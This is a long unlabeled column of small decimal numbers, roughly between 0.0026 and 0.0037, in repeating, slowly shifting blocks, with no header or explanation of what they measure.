0.00335018
0.00335018
0.00334439
0.00335703
0.00336299
0.0033628
0.00335708
0.00336304
0.00335702
0.00335679
0.00335703
0.00336299
0.0033628
0.00335708
0.00336304
0.00335702
0.00335679
0.00335692
0.00336276
0.00336276
0.003363
0.00335669
0.00335669
0.00335046
0.00334426
0.00335054
0.00334449
0.00335042
0.00335023
0.0033445
0.00335046
0.00334426
0.00335054
0.00334449
0.00335042
0.00335022
0.0033445
0.00330093
0.00330124
0.00329516
0.00329534
0.00330099
0.00330116
0.0032951
0.00330718
0.00331328
0.00330727
0.00331307
0.0033074
0.00330728
0.00330761
0.00331321
0.00331339
0.00331315
0.00330734
0.00330752
0.00330084
0.00329523
0.00330092
0.00330106
0.00329499
0.00330717
0.00330081
0.00330093
0.00330124
0.00329534
0.00329516
0.00330116
0.00330099
0.0032951
0.00330718
0.00331328
0.00330727
0.00331307
0.0033074
0.00330728
0.00330761
0.00331339
0.00331321
0.00331315
0.00330752
0.00330734
0.00330084
0.00329523
0.00330092
0.00330106
0.00329499
0.00330716
0.00330082
0.00330105
0.00329496
0.00329496
0.00330081
0.00330081
0.0032952
0.00330746
0.00331325
0.00331306
0.00330746
0.00331328
0.00330746
0.00330724
0.00330746
0.00331325
0.00331306
0.00330746
0.00331328
0.00330746
0.00330724
0.00330736
0.00331301
0.00331301
0.00331325
0.00330713
0.00330713
0.00330107
0.00329508
0.0033011
0.0032953
0.00330104
0.00330085
0.0032953
0.00330107
0.00329507
0.0033011
0.0032953
0.00330104
0.00330085
0.0032953
0.00325293
0.00325317
0.00324731
0.00324747
0.00325297
0.00325312
0.00324727
0.00325897
0.00326496
0.00325913
0.00326469
0.00325925
0.0032591
0.00325937
0.00326484
0.003265
0.0032648
0.00325915
0.00325931
0.00325282
0.00324742
0.00325295
0.00325309
0.00324713
0.00325902
0.00325286
0.00325293
0.00325317
0.00324747
0.00324731
0.00325312
0.00325297
0.00324727
0.00325897
0.00326496
0.00325913
0.00326469
0.00325925
0.0032591
0.00325937
0.003265
0.00326484
0.0032648
0.00325931
0.00325915
0.00325282
0.00324742
0.00325294
0.00325309
0.00324713
0.00325902
0.00325286
0.0032531
0.00324716
0.00324716
0.00325284
0.00325284
0.00324741
0.00325934
0.00326495
0.00326477
0.0032593
0.00326498
0.00325934
0.00325911
0.00325934
0.00326495
0.00326477
0.0032593
0.00326498
0.00325934
0.00325911
0.00325924
0.00326471
0.00326471
0.00326496
0.00325898
0.00325898
0.00325311
0.00324729
0.00325311
0.00324751
0.00325308
0.0032529
0.00324752
0.00325311
0.00324729
0.00325311
0.00324751
0.00325309
0.0032529
0.00324752
0.0032062
0.00320639
0.00320071
0.00320087
0.00320623
0.00320637
0.00320068
0.00321207
0.00321794
0.00321227
0.00321765
0.00321239
0.00321222
0.00321245
0.0032178
0.00321795
0.00321778
0.00321226
0.00321242
0.00320607
0.00320085
0.00320623
0.00320637
0.00320053
0.00321217
0.00320615
0.0032062
0.00320639
0.00320087
0.00320071
0.00320637
0.00320623
0.00320068
0.00321207
0.00321795
0.00321227
0.00321765
0.00321239
0.00321222
0.00321245
0.00321795
0.0032178
0.00321777
0.00321242
0.00321226
0.00320607
0.00320084
0.00320623
0.00320637
0.00320053
0.00321217
0.00320616
0.0032064
0.00320057
0.00320057
0.00320612
0.00320612
0.00320085
0.00321249
0.00321795
0.00321777
0.00321242
0.00321798
0.00321249
0.00321226
0.00321249
0.00321795
0.00321777
0.00321242
0.00321798
0.00321249
0.00321226
0.00321239
0.00321769
0.00321769
0.00321797
0.00321211
0.00321211
0.00320641
0.00320072
0.00320638
0.00320095
0.00320638
0.0032062
0.00320095
0.00320641
0.00320072
0.00320638
0.00320095
0.00320638
0.0032062
0.00320095
0.00316053
0.00316069
0.00315514
0.00315531
0.00316055
0.00316069
0.00315513
0.00316627
0.00317203
0.00316648
0.00317172
0.00316659
0.00316643
0.00316662
0.00317188
0.00317202
0.00317186
0.00316645
0.00316661
0.00316039
0.00315528
0.00316056
0.0031607
0.00315496
0.00316638
0.00316049
0.00316053
0.00316069
0.00315531
0.00315514
0.00316069
0.00316055
0.00315513
0.00316627
0.00317203
0.00316648
0.00317172
0.00316659
0.00316643
0.00316662
0.00317202
0.00317188
0.00317186
0.00316661
0.00316645
0.00316039
0.00315528
0.00316056
0.0031607
0.00315496
0.00316638
0.00316049
0.00316072
0.00315501
0.00315501
0.00316044
0.00316044
0.00315528
0.00316671
0.00317204
0.00317186
0.00316662
0.00317207
0.0031667
0.00316647
0.00316671
0.00317204
0.00317186
0.00316662
0.00317207
0.0031667
0.00316647
0.00316659
0.00317177
0.00317177
0.00317205
0.00316631
0.00316631
0.00316074
0.00315517
0.00316069
0.0031554
0.00316071
0.00316053
0.00315541
0.00316074
0.00315517
0.00316069
0.0031554
0.00316071
0.00316053
0.00315541
0.0031157
0.00311585
0.0031104
0.00311057
0.00311571
0.00311586
0.00311038
0.00312136
0.00312701
0.00312157
0.00312671
0.00312167
0.0031215
0.00312169
0.00312685
0.003127
0.00312684
0.00312152
0.00312169
0.00311558
0.00311055
0.00311575
0.00311587
0.00311025
0.00312147
0.00311568
0.0031157
0.00311585
0.00311057
0.0031104
0.00311586
0.00311571
0.00311038
0.00312136
0.00312701
0.00312156
0.00312671
0.00312166
0.0031215
0.00312168
0.003127
0.00312685
0.00312684
0.00312168
0.00312152
0.00311558
0.00311055
0.00311575
0.00311587
0.00311025
0.00312147
0.00311568
0.00311589
0.00311028
0.00311028
0.00311562
0.00311562
0.00311054
0.0031218
0.00312703
0.00312685
0.00312169
0.00312706
0.0031218
0.00312156
0.0031218
0.00312703
0.00312685
0.00312169
0.00312706
0.0031218
0.00312156
0.00312166
0.00312676
0.00312676
0.00312703
0.0031214
0.00312139
0.00311592
0.00311045
0.00311586
0.00311068
0.00311589
0.00311572
0.00311068
0.00311592
0.00311045
0.00311586
0.00311068
0.0031159
0.00311572
0.00311068
0.00307156
0.00307171
0.00306633
0.0030665
0.00307157
0.00307171
0.00306631
0.00307715
0.0030827
0.00307734
0.00308243
0.00307743
0.00307727
0.00307746
0.00308255
0.00308269
0.00308254
0.00307729
0.00307746
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00307725
0.00307154
0.00307156
0.00307171
0.0030665
0.00306634
0.00307171
0.00307157
0.00306631
0.00307716
0.0030827
0.00307735
0.00308243
0.00307743
0.00307728
0.00307746
0.00308269
0.00308255
0.00308254
0.00307746
0.0030773
0.00307146
0.00306647
0.00307161
0.00307172
0.0030662
0.00307725
0.00307154
0.00307173
0.00306623
0.00306623
0.0030715
0.0030715
0.00306646
0.00307758
0.00308274
0.00308256
0.00307746
0.00308275
0.00307759
0.00307735
0.00307758
0.00308274
0.00308256
0.00307746
0.00308275
0.00307759
0.00307735
0.00307742
0.00308247
0.00308247
0.00308271
0.00307718
0.00307718
0.00307177
0.00306639
0.00307172
0.00306663
0.00307176
0.00307158
0.00306661
0.00307177
0.00306639
0.00307172
0.00306663
0.00307176
0.00307158
0.00306661
0.00302799
0.00302814
0.00302283
0.00302299
0.003028
0.00302814
0.00302281
0.00303354
0.00303898
0.00303371
0.00303875
0.00303378
0.00303364
0.00303382
0.00303885
0.00303898
0.00303884
0.00303366
0.00303382
0.00302791
0.00302295
0.00302804
0.00302813
0.00302272
0.00303362
0.00302798
0.00302799
0.00302814
0.00302299
0.00302283
0.00302814
0.00302801
0.00302281
0.00303354
0.00303898
0.00303371
0.00303875
0.00303378
0.00303364
0.00303382
0.00303899
0.00303885
0.00303884
0.00303382
0.00303366
0.00302791
0.00302295
0.00302804
0.00302814
0.00302272
0.00303362
0.00302798
0.00302814
0.00302273
0.00302273
0.00302794
0.00302794
0.00302293
0.00303393
0.00303903
0.00303885
0.00303382
0.00303904
0.00303395
0.00303371
0.00303393
0.00303903
0.00303885
0.00303382
0.00303904
0.00303395
0.00303371
0.00303376
0.00303878
0.00303878
0.00303899
0.00303356
0.00303356
0.00302819
0.00302288
0.00302814
0.00302313
0.00302819
0.00302801
0.0030231
0.00302819
0.00302288
0.00302814
0.00302313
0.00302819
0.00302801
0.0030231
0.00298492
0.00298507
0.00297982
0.00297998
0.00298494
0.00298507
0.0029798
0.00299043
0.00299578
0.00299058
0.00299558
0.00299064
0.00299051
0.0029907
0.00299566
0.00299579
0.00299565
0.00299053
0.00299069
0.00298486
0.00297992
0.00298497
0.00298505
0.00297973
0.0029905
0.00298491
0.00298492
0.00298507
0.00297998
0.00297982
0.00298507
0.00298494
0.0029798
0.00299043
0.00299578
0.00299058
0.00299558
0.00299064
0.00299051
0.0029907
0.00299579
0.00299566
0.00299565
0.00299069
0.00299053
0.00298486
0.00297992
0.00298497
0.00298505
0.00297973
0.0029905
0.00298491
0.00298505
0.00297973
0.00297973
0.00298487
0.00298487
0.00297989
0.00299078
0.00299584
0.00299566
0.00299068
0.00299583
0.00299083
0.00299057
0.00299078
0.00299584
0.00299566
0.00299068
0.00299583
0.00299083
0.00299057
0.00299061
0.0029956
0.0029956
0.00299578
0.00299044
0.00299044
0.0029851
0.00297986
0.00298506
0.00298012
0.00298512
0.00298494
0.00298007
0.0029851
0.00297986
0.00298506
0.00298012
0.00298512
0.00298494
0.00298007
0.00294231
0.00294246
0.00293725
0.00293741
0.00294232
0.00294245
0.00293723
0.00294778
0.00295304
0.0029479
0.00295287
0.00294795
0.00294783
0.00294803
0.00295294
0.00295306
0.00295293
0.00294785
0.00294801
0.00294226
0.00293735
0.00294236
0.00294243
0.00293718
0.00294783
0.0029423
0.00294231
0.00294246
0.00293741
0.00293725
0.00294245
0.00294232
0.00293723
0.00294778
0.00295304
0.0029479
0.00295287
0.00294795
0.00294783
0.00294803
0.00295306
0.00295293
0.00295292
0.00294801
0.00294785
0.00294226
0.00293735
0.00294235
0.00294243
0.00293718
0.00294783
0.0029423
0.00294242
0.00293717
0.00293717
0.00294227
0.00294227
0.00293732
0.00294809
0.00295311
0.00295294
0.00294799
0.00295309
0.00294816
0.0029479
0.00294809
0.00295311
0.00295294
0.00294799
0.00295309
0.00294815
0.0029479
0.00294792
0.00295288
0.00295288
0.00295304
0.00294777
0.00294777
0.00294247
0.0029373
0.00294243
0.00293755
0.0029425
0.00294232
0.00293749
0.00294247
0.0029373
0.00294243
0.00293755
0.0029425
0.00294232
0.00293749
0.00290013
0.00290027
0.00289511
0.00289526
0.00290014
0.00290025
0.0028951
0.00290555
0.00291074
0.00290566
0.0029106
0.0029057
0.00290559
0.00290578
0.00291065
0.00291077
0.00291064
0.00290561
0.00290576
0.00290009
0.0028952
0.00290016
0.00290023
0.00289505
0.00290559
0.00290012
0.00290013
0.00290027
0.00289526
0.00289511
0.00290025
0.00290013
0.00289509
0.00290555
0.00291074
0.00290566
0.0029106
0.0029057
0.00290559
0.00290578
0.00291076
0.00291064
0.00291063
0.00290576
0.00290561
0.00290009
0.0028952
0.00290016
0.00290023
0.00289505
0.00290559
0.00290012
0.00290022
0.00289504
0.00289504
0.00290008
0.00290008
0.00289516
0.00290583
0.00291081
0.00291064
0.00290574
0.00291077
0.00290591
0.00290565
0.00290583
0.00291081
0.00291064
0.00290574
0.00291077
0.00290591
0.00290565
0.00290566
0.00291059
0.00291059
0.00291073
0.00290553
0.00290553
0.00290026
0.00289515
0.00290023
0.00289541
0.0029003
0.00290013
0.00289533
0.00290026
0.00289515
0.00290023
0.00289541
0.0029003
0.00290013
0.00289533
0.00285834
0.00285848
0.00285337
0.00285351
0.00285835
0.00285846
0.00285335
0.00286372
0.00286884
0.00286381
0.00286872
0.00286385
0.00286375
0.00286394
0.00286876
0.00286887
0.00286875
0.00286377
0.00286391
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00286375
0.00285833
0.00285834
0.00285848
0.00285351
0.00285337
0.00285846
0.00285835
0.00285335
0.00286372
0.00286884
0.00286381
0.00286872
0.00286385
0.00286375
0.00286394
0.00286887
0.00286876
0.00286875
0.00286391
0.00286377
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00286375
0.00285833
0.00285842
0.0028533
0.0028533
0.0028583
0.0028583
0.00285341
0.00286397
0.00286891
0.00286875
0.00286388
0.00286887
0.00286406
0.0028638
0.00286397
0.00286891
0.00286875
0.00286388
0.00286887
0.00286406
0.0028638
0.00286381
0.00286871
0.00286871
0.00286883
0.0028637
0.0028637
0.00285845
0.0028534
0.00285843
0.00285366
0.0028585
0.00285834
0.00285357
0.00285845
0.0028534
0.00285843
0.00285366
0.0028585
0.00285834
0.00285357
0.00281694
0.00281706
0.002812
0.00281214
0.00281694
0.00281704
0.00281199
0.00282227
0.00282734
0.00282235
0.00282723
0.00282238
0.0028223
0.00282248
0.00282726
0.00282736
0.00282726
0.00282231
0.00282245
0.00281691
0.00281207
0.00281696
0.00281702
0.00281197
0.00282229
0.00281692
0.00281694
0.00281706
0.00281214
0.002812
0.00281704
0.00281694
0.00281199
0.00282227
0.00282734
0.00282235
0.00282723
0.00282238
0.0028223
0.00282248
0.00282736
0.00282726
0.00282725
0.00282245
0.00282231
0.00281691
0.00281207
0.00281696
0.00281702
0.00281197
0.00282229
0.00281692
0.002817
0.00281194
0.00281193
0.00281689
0.00281689
0.00281203
0.0028225
0.0028274
0.00282725
0.00282241
0.00282735
0.00282259
0.00282234
0.0028225
0.0028274
0.00282725
0.00282241
0.00282735
0.00282259
0.00282234
0.00282234
0.00282721
0.00282721
0.00282732
0.00282224
0.00282224
0.00281703
0.00281203
0.00281701
0.00281228
0.00281708
0.00281693
0.00281219
0.00281703
0.00281203
0.00281701
0.00281228
0.00281708
0.00281693
0.00281219
0.00277589
0.002776
0.00277099
0.00277112
0.00277589
0.00277598
0.00277098
0.00278118
0.00278619
0.00278124
0.0027861
0.00278128
0.0027812
0.00278137
0.00278612
0.00278621
0.00278612
0.00278121
0.00278134
0.00277587
0.00277105
0.00277591
0.00277596
0.00277096
0.00278119
0.00277587
0.00277589
0.002776
0.00277112
0.00277099
0.00277598
0.00277589
0.00277098
0.00278118
0.00278619
0.00278124
0.0027861
0.00278127
0.0027812
0.00278137
0.00278621
0.00278612
0.00278612
0.00278134
0.00278121
0.00277587
0.00277105
0.0027759
0.00277596
0.00277096
0.00278119
0.00277587
0.00277594
0.00277092
0.00277092
0.00277584
0.00277584
0.00277101
0.00278138
0.00278624
0.0027861
0.0027813
0.00278619
0.00278148
0.00278123
0.00278138
0.00278624
0.0027861
0.0027813
0.00278619
0.00278148
0.00278123
0.00278123
0.00278607
0.00278607
0.00278617
0.00278114
0.00278114
0.00277596
0.00277101
0.00277595
0.00277126
0.00277601
0.00277587
0.00277116
0.00277596
0.00277101
0.00277595
0.00277126
0.00277601
0.00277587
0.00277116
0.00273517
0.00273527
0.0027303
0.00273042
0.00273517
0.00273525
0.00273029
0.00274042
0.00274538
0.00274048
0.0027453
0.0027405
0.00274044
0.00274059
0.00274532
0.0027454
0.00274532
0.00274044
0.00274056
0.00273515
0.00273035
0.00273517
0.00273523
0.00273027
0.00274042
0.00273515
0.00273517
0.00273527
0.00273042
0.0027303
0.00273525
0.00273517
0.0027303
0.00274042
0.00274538
0.00274047
0.0027453
0.0027405
0.00274044
0.00274059
0.0027454
0.00274532
0.00274532
0.00274056
0.00274044
0.00273515
0.00273035
0.00273518
0.00273523
0.00273028
0.00274042
0.00273515
0.00273521
0.00273023
0.00273023
0.00273512
0.00273512
0.00273031
0.0027406
0.00274542
0.0027453
0.00274052
0.00274538
0.0027407
0.00274046
0.0027406
0.00274542
0.0027453
0.00274052
0.00274538
0.0027407
0.00274046
0.00274046
0.00274527
0.00274527
0.00274536
0.00274038
0.00274038
0.00273522
0.00273031
0.00273521
0.00273055
0.00273527
0.00273514
0.00273045
0.00273522
0.00273031
0.00273521
0.00273055
0.00273527
0.00273514
0.00273045
0.00269475
0.00269484
0.00268991
0.00269002
0.00269475
0.00269482
0.00268991
0.00269996
0.00270488
0.0027
0.00270481
0.00270003
0.00269998
0.00270012
0.00270482
0.0027049
0.00270483
0.00269998
0.00270009
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00269995
0.00269472
0.00269475
0.00269484
0.00269002
0.00268991
0.00269482
0.00269475
0.00268991
0.00269996
0.00270488
0.0027
0.00270481
0.00270003
0.00269998
0.00270012
0.0027049
0.00270483
0.00270483
0.00270009
0.00269998
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00269996
0.00269472
0.00269478
0.00268985
0.00268985
0.0026947
0.0026947
0.00268992
0.00270013
0.00270491
0.0027048
0.00270005
0.00270487
0.00270023
0.00269999
0.00270013
0.00270492
0.0027048
0.00270005
0.00270487
0.00270023
0.00269999
0.00269999
0.00270478
0.00270478
0.00270486
0.00269992
0.00269992
0.00269479
0.00268992
0.00269478
0.00269015
0.00269483
0.00269472
0.00269005
0.00269479
0.00268992
0.00269478
0.00269015
0.00269483
0.00269472
0.00269005
0.00265461
0.00265469
0.0026498
0.0026499
0.00265461
0.00265467
0.0026498
0.00265978
0.00266466
0.00265982
0.0026646
0.00265984
0.0026598
0.00265993
0.00266462
0.00266468
0.00266462
0.00265981
0.0026599
0.00265459
0.00264984
0.0026546
0.00265465
0.00264978
0.00265979
0.00265459
0.00265978
0.00266467
0.00265982
0.0026646
0.00265984
0.0026598
0.00265993
0.00266468
0.00266462
0.00266462
0.0026599
0.00265981
0.00265461
0.00265978
0.00265464
0.00264974
0.00264974
0.00265456
0.00265456
0.00264981
0.00265994
0.00266469
0.00266459
0.00265986
0.00266465
0.00266004
0.00265981
0.00265994
0.00266469
0.00266459
0.00265986
0.00266465
0.00266004
0.00265981
0.00265981
0.00266457
0.00266457
0.00266465
0.00265974
0.00265974
0.00265464
0.00264981
0.00265464
0.00265003
0.00265468
0.00265458
0.00264993
0.00265464
0.00264981
0.00265464
0.00265003
0.00265468
0.00265458
0.00264993
0.00365198
0.00365072
0.0036381
0.00361562
0.0036156
0.00362668
0.003652
0.0036204
0.00363228
0.0036508
0.00362036
0.00363226
0.00362065
0.00361784
0.00362072
0.0036176
0.00361181
0.0036432
0.00364356
0.00363218
0.00359691
0.00359713
0.00360792
0.00359964
0.00361129
0.00361127
0.00361744
0.00360363
0.00360362
0.00360047
0.0035868
0.00360495
0.0035841
0.00360682
0.00359647
0.00358628
0.00360048
0.00358683
0.0036051
0.00358418
0.00360705
0.00359653
0.00358631
0.00361117
0.00364678
0.00361752
0.00361297
0.00362728
0.00360307
0.00360832
0.00361118
0.00364724
0.00361747
0.003613
0.00362726
0.00360336
0.0036083
0.00360722
0.00359239
0.00359244
0.00360789
0.00360783
0.00358777
0.00362205
0.00360931
0.00361071
0.00361029
0.00360153
0.00360651
0.00362422
0.00361741
0.00361335
0.00360319
0.00359954
0.00360428
0.003622
0.00360931
0.00361069
0.00361028
0.00360152
0.0036065
0.00362415
0.00361738
0.00361332
0.00360319
0.00359954
0.00360427
0.00360698
0.00363035
0.00362375
0.00361051
0.00360924
0.00361034
0.00360973
0.00359272
0.00360606
0.00360828
0.00362559
0.00361865
0.00361295
0.00356843
0.00360009
0.00357605
0.00358435
0.00358597
0.00360326
0.00359999
0.00360711
0.00363021
0.00362374
0.0036105
0.00360923
0.00361022
0.00361113
0.00359271
0.00360858
0.00360613
0.00362554
0.00361736
0.00361277
0.00356812
0.00360009
0.00357611
0.0035844
0.00360328
0.0036
0.00358617
0.00360009
0.00361462
0.00360597
0.00360611
0.00360705
0.00360594
0.0035994
0.00359753
0.00359626
0.00360666
0.00359907
0.00360028
0.00360345
0.00359394
0.00360178
0.00362037
0.00361336
0.00361285
0.00360447
0.00360946
0.00360693
0.00359578
0.00360064
0.00359747
0.00359241
0.00360159
0.00359508
0.00359291
0.00360009
0.0036146
0.00360596
0.00360611
0.00360704
0.00360592
0.0035994
0.00359753
0.00359625
0.00360665
0.00359906
0.00360344
0.00360027
0.00359394
0.00360177
0.00362033
0.00361333
0.00361323
0.00360944
0.00360698
0.00360444
0.00359578
0.00360064
0.00359747
0.00359241
0.00360158
0.00359508
0.0035929
0.00365018
0.0036511
0.00363811
0.00361561
0.00361562
0.0036267
0.00365042
0.00362038
0.0036323
0.00365111
0.00362041
0.0036323
0.00362115
0.0036176
0.00361177
0.00364321
0.00364104
0.0036322
0.00359684
0.00359696
0.00360791
0.00359964
0.00361128
0.00361129
0.00360362
0.00361744
0.00360362
0.00360046
0.00358681
0.00360508
0.00358411
0.0035965
0.00360682
0.00358627
0.00360043
0.00358678
0.00360496
0.00358414
0.00360677
0.00359646
0.00358625
0.00361116
0.00364658
0.00361749
0.00361299
0.0036083
0.00362729
0.00360306
0.00361115
0.00364573
0.00361752
0.003613
0.00362729
0.00360308
0.00360831
0.00360716
0.00359237
0.00359232
0.00360778
0.00360781
0.00358776
0.00362059
0.00361788
0.00362204
0.0036093
0.00361068
0.00361026
0.00360152
0.00360649
0.00362421
0.00361736
0.00361331
0.00360318
0.00359953
0.00360426
0.0036093
0.003622
0.00361069
0.00360152
0.00361027
0.0036065
0.00360318
0.00359954
0.00360427
0.00362415
0.00361738
0.00361332
0.00360808
0.00362367
0.00363047
0.00361049
0.00361017
0.00360923
0.00361109
0.00359272
0.00360609
0.00360864
0.00362554
0.00361735
0.00361276
0.00356918
0.00360019
0.00358442
0.00357616
0.00358619
0.00360027
0.00360346
0.00360006
0.00361457
0.00360595
0.00360609
0.00360703
0.00360587
0.00359939
0.00359752
0.00359625
0.00360664
0.00359906
0.00360026
0.00360343
0.00359394
0.00360175
0.00362032
0.00361331
0.00361322
0.00360443
0.00360942
0.00360691
0.00359577
0.00360063
0.00359747
0.00359241
0.00360157
0.00359507
0.0035929
0.00360711
0.00363048
0.00362369
0.0036105
0.00360923
0.00361033
0.00361109
0.00359271
0.0036087
0.00360625
0.00362549
0.00361742
0.00361286
0.00356827
0.00360016
0.00357611
0.00358441
0.00360337
0.00360016
0.0035861
0.00360009
0.00360596
0.0036146
0.00360611
0.00360704
0.0035994
0.00360595
0.00359753
0.00359626
0.00359906
0.00360665
0.00360344
0.00359394
0.00360027
0.00359578
0.00360063
0.00359747
0.00359241
0.00360158
0.00359508
0.00359291
0.00360177
0.00362032
0.00361333
0.00361325
0.00360944
0.00360696
0.00360444
0.00359147
0.00359147
0.00359223
0.00359789
0.00359789
0.00359532
0.00359294
0.00359615
0.00359373
0.00359294
0.00359615
0.00359373
0.00359147
0.00359147
0.00359223
0.00359789
0.00359789
0.00359532
0.00359294
0.00359615
0.00359373
0.00359295
0.00359616
0.00359374
0.00359147
0.00359147
0.00359223
0.00359789
0.00359789
0.00359532
0.00359294
0.00359615
0.00359374
0.00359295
0.00359616
0.00359374
0.00358742
0.0035901
0.0035901
0.00358638
0.00359079
0.0035869
0.0035869
0.00359009
0.00359335
0.0035959
0.0035959
0.00359372
0.00359163
0.00359163
0.00358875
0.00359152
0.00359438
0.00358977
0.00359223
0.00359029
0.00358822
0.00358875
0.00359152
0.00359438
0.00358977
0.00359223
0.00359029
0.00358822
0.00358742
0.0035901
0.0035901
0.00358638
0.00359079
0.0035869
0.0035869
0.00359009
0.00359335
0.0035959
0.0035959
0.00359163
0.00359372
0.00359163
0.00358875
0.00359152
0.00359438
0.00358977
0.00359029
0.00359223
0.00358822
0.00358875
0.00359152
0.00359438
0.00358977
0.00359223
0.00358822
0.00359029
0.00358743
0.0035901
0.00359011
0.00358638
0.0035908
0.0035869
0.00358691
0.0035901
0.00359335
0.0035959
0.0035959
0.00359163
0.00359372
0.00359163
0.00358875
0.00359152
0.00359438
0.00358977
0.0035903
0.00359223
0.00358823
0.00358875
0.00359152
0.00359438
0.00358978
0.00359224
0.00358823
0.0035903
0.00358743
0.0035901
0.00359011
0.00358638
0.0035908
0.0035869
0.00358691
0.0035901
0.00359335
0.0035959
0.0035959
0.00359372
0.00359163
0.00359163
0.00358875
0.00359152
0.00359438
0.00358977
0.00359223
0.00358823
0.0035903
0.00358875
0.00359152
0.00359439
0.00358978
0.00359224
0.00358823
0.0035903
0.00360928
0.00362195
0.00361067
0.00360152
0.00361027
0.00360649
0.00360318
0.00359954
0.00360426
0.0036241
0.00361737
0.00361329
0.00360009
0.00361461
0.00360595
0.00360611
0.00360704
0.00360593
0.0035994
0.00359753
0.00359626
0.00360666
0.00359907
0.00360345
0.00360028
0.00359394
0.00360178
0.00362037
0.00361336
0.00361287
0.00360946
0.00360447
0.00360693
0.00359578
0.00360063
0.00359747
0.00359241
0.00360158
0.00359291
0.00359508
0.00360678
0.00362375
0.00363036
0.00361051
0.00361033
0.00360926
0.00360972
0.00359274
0.00360837
0.00360618
0.00362559
0.00361868
0.00361291
0.00356814
0.00360011
0.00358438
0.00357608
0.00360005
0.00360333
0.00358617
0.0036001
0.00360595
0.00361456
0.0036061
0.00360703
0.0035994
0.00360596
0.00359754
0.00359626
0.00359906
0.00360665
0.00359394
0.00360344
0.00360028
0.00359578
0.00360063
0.00359747
0.00359241
0.00359291
0.00360157
0.00359508
0.0036018
0.00362032
0.00361334
0.00361292
0.00360944
0.00360709
0.00360448
0.00360782
0.0036303
0.00362368
0.0036105
0.00360926
0.00361041
0.00360951
0.00359278
0.00360819
0.00360647
0.00362554
0.00361868
0.00361327
0.00356825
0.0036001
0.00357612
0.00358436
0.00360335
0.0035999
0.00358608
0.00365067
0.00365075
0.00363807
0.0036156
0.00361561
0.00362667
0.00365074
0.00362038
0.00363227
0.00365042
0.00362038
0.00363226
0.00362083
0.00361777
0.00361152
0.00364248
0.00364111
0.00363213
0.00359701
0.00359714
0.0036079
0.00359964
0.00361127
0.00361128
0.00360362
0.00361742
0.00360362
0.00360044
0.00358683
0.003605
0.00358408
0.00359649
0.00360665
0.00358634
0.00360046
0.00358682
0.00360507
0.0035841
0.00360682
0.0035965
0.00358632
0.00361099
0.00364552
0.00361749
0.00361305
0.00360828
0.00362724
0.00360319
0.00361102
0.0036459
0.0036175
0.00361301
0.00362725
0.00360312
0.0036083
0.00360719
0.00359216
0.00359214
0.00360772
0.0036078
0.00358778
0.00362107
0.00361763
0.00360933
0.00362206
0.00361072
0.00360153
0.0036103
0.00360652
0.0036032
0.00359955
0.00360429
0.00362422
0.00361742
0.00361336
0.0036001
0.00360598
0.00361463
0.00360615
0.00360706
0.00359942
0.00360598
0.00359753
0.00359626
0.00359907
0.00360666
0.00360345
0.00359394
0.00360027
0.00359579
0.00360065
0.00359748
0.00359242
0.00360159
0.00359291
0.00359509
0.00360178
0.00362034
0.00361335
0.00361324
0.00360946
0.00360445
0.00360698
0.00360011
0.00360598
0.00361462
0.00360614
0.00360706
0.00359942
0.00360595
0.00359754
0.00359626
0.00359907
0.00360667
0.00359395
0.00360346
0.00360028
0.00359579
0.00360065
0.00359748
0.00359242
0.00359291
0.0036016
0.00359509
0.00360179
0.00362037
0.00361337
0.00361285
0.00360947
0.00360694
0.00360447
0.00360751
0.00362374
0.00363035
0.00361056
0.00361036
0.00360942
0.00361111
0.00359272
0.00360857
0.00360614
0.00362556
0.00361739
0.00361293
0.00356826
0.00360013
0.00358441
0.00357608
0.00360009
0.00360335
0.00358613
0.00360751
0.00362377
0.00363038
0.00361056
0.00361032
0.0036094
0.00360966
0.00359273
0.0036083
0.00360615
0.00362558
0.00361871
0.00361289
0.00356836
0.00360013
0.00358439
0.00357608
0.00359999
0.00360336
0.00358614
0.00361149
0.00364296
0.00364276
0.0036322
0.00359694
0.00359696
0.00360789
0.00359964
0.00361128
0.00361129
0.00361743
0.00360361
0.00360362
0.00360037
0.0035868
0.00360491
0.00358405
0.00358628
0.00359645
0.00360647
0.00360038
0.00358679
0.00360488
0.00358403
0.00358631
0.00359644
0.00360629
0.00361096
0.00364593
0.0036175
0.00361306
0.00362728
0.00360829
0.00360314
0.00361096
0.0036462
0.00361754
0.003613
0.0036273
0.00360829
0.0036031
0.00360707
0.00359198
0.003592
0.00358771
0.00360754
0.00360752
0.0036203
0.00361784
0.00362054
0.00361783
0.0035358
0.00354895
0.0035357
0.00354891
0.00355352
0.00354734
0.00354732
0.00355044
0.00355045
0.00354955
0.00355432
0.00356961
0.00355177
0.00355235
0.00356521
0.00354759
0.0035562
0.00355433
0.00356963
0.00355175
0.00355242
0.00356524
0.00354758
0.00355622
0.00355059
0.00353076
0.00353072
0.00355514
0.00353934
0.00353936
0.00355221
0.003548
0.00355316
0.00354776
0.00355111
0.00354849
0.00355147
0.00355222
0.003548
0.00355319
0.00354776
0.00355111
0.00354849
0.00355148
0.0035292
0.00353464
0.00352919
0.00353465
0.00353673
0.00354034
0.00354031
0.00354243
0.00353499
0.00353499
0.00353027
0.00352403
0.00353095
0.00352439
0.00353002
0.00352966
0.00352455
0.00353027
0.00352403
0.00353095
0.00352438
0.00353002
0.00352966
0.00352455
0.00353619
0.00354126
0.00354145
0.00353681
0.00354194
0.00353573
0.00353569
0.0035362
0.00354126
0.00354145
0.00353682
0.00354195
0.00353575
0.0035357
0.00353091
0.00352381
0.00352381
0.00352942
0.00352942
0.00352511
0.00355278
0.00355432
0.00354684
0.00354975
0.0035494
0.00355427
0.0035487
0.00352992
0.00355695
0.00354529
0.00351286
0.00354863
0.00354815
0.00355887
0.00355672
0.00356299
0.00354956
0.00354835
0.00355578
0.00354983
0.00354942
0.00355061
0.00355245
0.00354727
0.00353597
0.00354088
0.00354288
0.00353727
0.00354159
0.00353534
0.00353701
0.00352943
0.00352999
0.00352507
0.00352391
0.00353079
0.00353487
0.00354228
0.00353559
0.00354
0.00353655
0.00353019
0.0035312
0.00352408
0.00352524
0.00352448
0.00352964
0.00353104
0.00353595
0.00354088
0.00354287
0.00353727
0.00354158
0.00353535
0.003537
0.00352942
0.00352998
0.00352507
0.00353079
0.0035239
0.00353486
0.00354227
0.0035356
0.00353999
0.00353655
0.00353019
0.0035312
0.00352408
0.00352523
0.00352965
0.00353104
0.00352448
0.00355351
0.00354731
0.00354731
